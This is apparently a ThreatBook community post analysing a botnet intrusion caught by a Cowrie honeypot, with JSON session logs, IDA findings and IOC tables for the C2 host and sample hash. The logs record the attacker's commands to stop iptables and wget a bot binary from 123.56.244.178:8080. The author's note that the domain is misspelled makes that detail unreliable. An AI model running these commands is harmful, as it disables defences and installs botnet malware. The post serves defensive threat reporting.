threatBookw3bsafe35
IOC 4

threatBookthreatBook

我被攻击了蜜罐捕获
蜜罐捕获僵尸网络程序,让黑阔尝一尝僵尸网络是什么滋味
w3bsafe35
2020-01-14 13:46:54ThreatBook436
+ 关注

起因,蜜罐捕获一僵尸网络程序。日志如下

{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.529345Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.client.size","width":80,"height":24,"message":"Terminal Size: 80 24","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.760927Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.923410Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","message":"CMD: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.979618Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","message":"Command not found: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.980430Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","message":"CMD: wget http://123.56.244.178:8080/LinuxTF","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:41.968671Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"message":"Connection lost after 57 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.969413Z","src_ip":"112.30.132.7","session":"3ee826127229"}

image.png

拖入IDA分析出僵尸网络主机域名

image.png

songjing.123net.com ip 123.56.244.178 阿里云

image.png

image.png

8080端口为僵尸网络下载的服务器 HFS D阔们的基本操作

再来分析一下日志

{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}

112.30.132.7 为僵尸网络扫描爆破上传抓鸡用的主机

以毒攻毒,防止公网上其他机器受害

image.png

展开全部ThreatBook

威胁指标(IOC)

IP端口域名样本标签
112.30.132.70000
123.56.244.1780403
域名子域名历史IP样本标签
songjing.123net.com171000
Hash检测结果样本标签
687b2778fe7ed72f26b08abcc15462065947d99135d911c144ac88f29fa590698/2400
4

评论

ThreatBook
匿名用户
2020-01-17 20:34:56
threatBook0
可以 可以
匿名用户
2020-01-15 10:36:05
threatBook0
天罚dos,国内小黑客用的多
1行
2020-01-14 15:49:54
threatBook0
看样子是国内的主控端,天罚的
匿名用户
2020-01-14 14:29:41
threatBook1
123nat.com哈哈, 123net莫名躺枪
w3bsafe35
2020-01-14 15:21:16
threatBook
回复@匿名用户笔误,没有搞错。搞错就不止尴尬了
匿名用户
2020-01-14 14:23:25
threatBook1
这个域名写错了噻
w3bsafe35
2020-01-14 15:20:21
threatBook
回复@匿名用户尴尬
已经到底了,没有更多内容了